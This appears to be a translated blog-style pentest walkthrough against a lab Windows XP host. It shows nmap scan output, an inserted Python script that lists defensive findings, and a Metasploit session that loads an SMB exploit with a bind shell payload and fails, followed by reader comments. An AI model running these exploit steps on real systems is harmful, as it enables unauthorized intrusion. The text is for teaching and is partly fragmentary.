To perform a pentest there are several stages we have to go through.
First we have to do information gathering and service enumeration.
Here we do information gathering and service enumeration using the nmap tool.
Scanning with the nmap Tool
Type the command: # nmap -T4 -A -v 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.00054s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp WAR-FTPD 1.65 (Name Jgaa's Fan Club FTP Service)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:8E:6C:39 (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| nbstat:
| NetBIOS name: XPSP3, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:8e:6c:39 (Cadmus Computer Systems)
| Names
| XPSP3<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| XPSP3<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| Computer name: xpsp3
| NetBIOS computer name: XPSP3
| Workgroup: WORKGROUP
|_ System time: 2012-12-22 01:25:23 UTC+7
TRACEROUTE
HOP RTT ADDRESS
1 0.54 ms 192.168.56.101
NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.54 seconds
Raw packets sent: 1106 (49.362KB) | Rcvd: 1017 (41.238KB)
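As an added example (not part of the original post), a small Python script that parses the nmap output above and turns the lines a defender cares about into findings: the unsupported OS, SMB signing disabled, SMBv1 only, guest access and the cleartext FTP service. The severity labels are this example's own assumption, not something nmap reports.

```python
import re

# Lines from the nmap -A output above, embedded here as sample input.
NMAP_OUTPUT = """\
21/tcp open ftp WAR-FTPD 1.65 (Name Jgaa's Fan Club FTP Service)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
OS details: Microsoft Windows XP SP2 or SP3
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| Account that was used for smb scripts: guest
|_ Message signing disabled (dangerous, but default)
"""

# (regex tested per line, severity, finding). The severity labels are
# this example's own assumption, not something nmap reports.
RULES = [
    (r"^OS details: .*Windows XP", "high",
     "Windows XP host: unsupported OS, no security updates"),
    (r"Message signing disabled", "high",
     "SMB signing disabled: exposed to SMB relay and in-path tampering"),
    (r"doesn't support SMBv2", "medium",
     "SMBv1 only: no SMB2+ protocol protections"),
    (r"Account that was used for smb scripts: guest", "medium",
     "Guest account accepted for SMB enumeration"),
    (r"^21/tcp\s+open\s+ftp", "medium",
     "Cleartext FTP service exposed"),
]

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)(?:\s+(.*))?$")

def parse_open_ports(text):
    """Return [(port, proto, service, version)] for each open port line."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            ports.append((int(m.group(1)), m.group(2), m.group(3), m.group(4) or ""))
    return ports

def triage(text):
    """Return [(severity, finding)] for every rule matched by some line, once each."""
    findings = []
    for line in text.splitlines():
        for pattern, severity, finding in RULES:
            hit = (severity, finding)
            if re.search(pattern, line.strip()) and hit not in findings:
                findings.append(hit)
    return findings
```

Feed it the full text of an nmap -A run to get the same findings list for other hosts; rules are matched per line, so the `| ` script-output prefixes do not matter.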
Then we use Metasploit to check the vulnerability manually.
Before that, start the console:
root@bt:~# msfconsole 192.168.56.101
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
=[ svn r15728 updated 134 days ago (2012.08.10)
Warning: This copy of the Metasploit Framework was last updated 134 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf >
Then we search for SMB modules. Type the command
msf > search smb
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
Microsoft Workstation Service NetAddAlternateComputerName Overflow
exploit/windows/smb/ms04_007_killbill 2004-02-10 00:00:00 UTC low Microsoft ASN.1 Library Bitstring Heap Overflow
exploit/windows/smb/ms04_011_lsass 2004-04-13 00:00:00 UTC good Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
exploit/windows/smb/ms04_031_netdde 2004-10-12 00:00:00 UTC good Microsoft NetDDE Service Overflow
exploit/windows/smb/ms05_039_pnp 2005-08-09 00:00:00 UTC good Microsoft Plug and Play Service Overflow
exploit/windows/smb/ms06_025_rasmans_reg 2006-06-13 00:00:00 UTC good Microsoft RRAS Service RASMAN Registry Overflow
exploit/windows/smb/ms06_025_rras 2006-06-13 00:00:00 UTC average Microsoft RRAS Service Overflow
exploit/windows/smb/ms06_040_netapi 2006-08-08 00:00:00 UTC good Microsoft Server Service NetpwPathCanonicalize Overflow
exploit/windows/smb/ms06_066_nwapi 2006-11-14 00:00:00 UTC good Microsoft Services MS06-066 nwapi32.dll Module Exploit
exploit/windows/smb/ms06_066_nwwks 2006-11-14 00:00:00 UTC good Microsoft Services MS06-066 nwwks.dll Module Exploit
exploit/windows/smb/ms06_070_wkssvc 2006-11-14 00:00:00 UTC manual Microsoft Workstation Service NetpManageIPCConnect Overflow
exploit/windows/smb/ms07_029_msdns_zonename 2007-04-12 00:00:00 UTC manual Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption
exploit/windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 00:00:00 UTC good Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
exploit/windows/smb/ms10_061_spoolss 2010-09-14 00:00:00 UTC excellent Microsoft Print Spooler Service Impersonation Vulnerability
exploit/windows/smb/netidentity_xtierrpcpipe 2009-04-06 00:00:00 UTC great
Then select the SMB module to use. Type the command
msf > use exploit/windows/smb/ms04_007_killbill
Then type the command
msf exploit(ms04_007_killbill) > show options
Module options (exploit/windows/smb/ms04_007_killbill):
Name Current Setting Required Description
---- --------------- -------- -----------
PROTO smb yes Which protocol to use: http or smb
RHOST yes The target address
RPORT 445 yes Set the SMB service port
Exploit target:
Id Name
-- ----
0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1
msf exploit(ms04_007_killbill) > show options
Module options (exploit/windows/smb/ms04_007_killbill):
Name Current Setting Required Description
---- --------------- -------- -----------
PROTO smb yes Which protocol to use: http or smb
RHOST yes The target address
RPORT 445 yes Set the SMB service port
Payload options (windows/shell/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1
msf exploit(ms04_007_killbill) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms04_007_killbill) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms04_007_killbill) > show options
Module options (exploit/windows/smb/ms04_007_killbill):
Name Current Setting Required Description
---- --------------- -------- -----------
PROTO smb yes Which protocol to use: http or smb
RHOST 192.168.56.101 yes The target address
RPORT 445 yes Set the SMB service port
Payload options (windows/shell/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LPORT 4444 yes The listen port
RHOST 192.168.56.101 no The target address
Exploit target:
Id Name
-- ----
0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1
msf exploit(ms04_007_killbill) > set TARGET 0
TARGET => 0
msf exploit(ms04_007_killbill) > exploit
[*] Started bind handler
[-] Error: The server responded with error: STATUS_INVALID_PARAMETER (Command=115 WordCount=0)
Note that the nmap fingerprint above reports Windows XP SP2 or SP3, while the only target this module offers (Id 0) covers Windows 2000 SP2-SP4 and Windows XP SP0-SP1, so this error is consistent with the host being outside the module's supported targets.
Scanning with the Nessus Tool
Then click the Launch Scan button.
Sorry, still an error, please help further :-)
Hi, I'm using ms08_067_netapi
here: http://scx030c067.blogspot.com/2012/12/exploit-ms08-067-in-windows-xp.html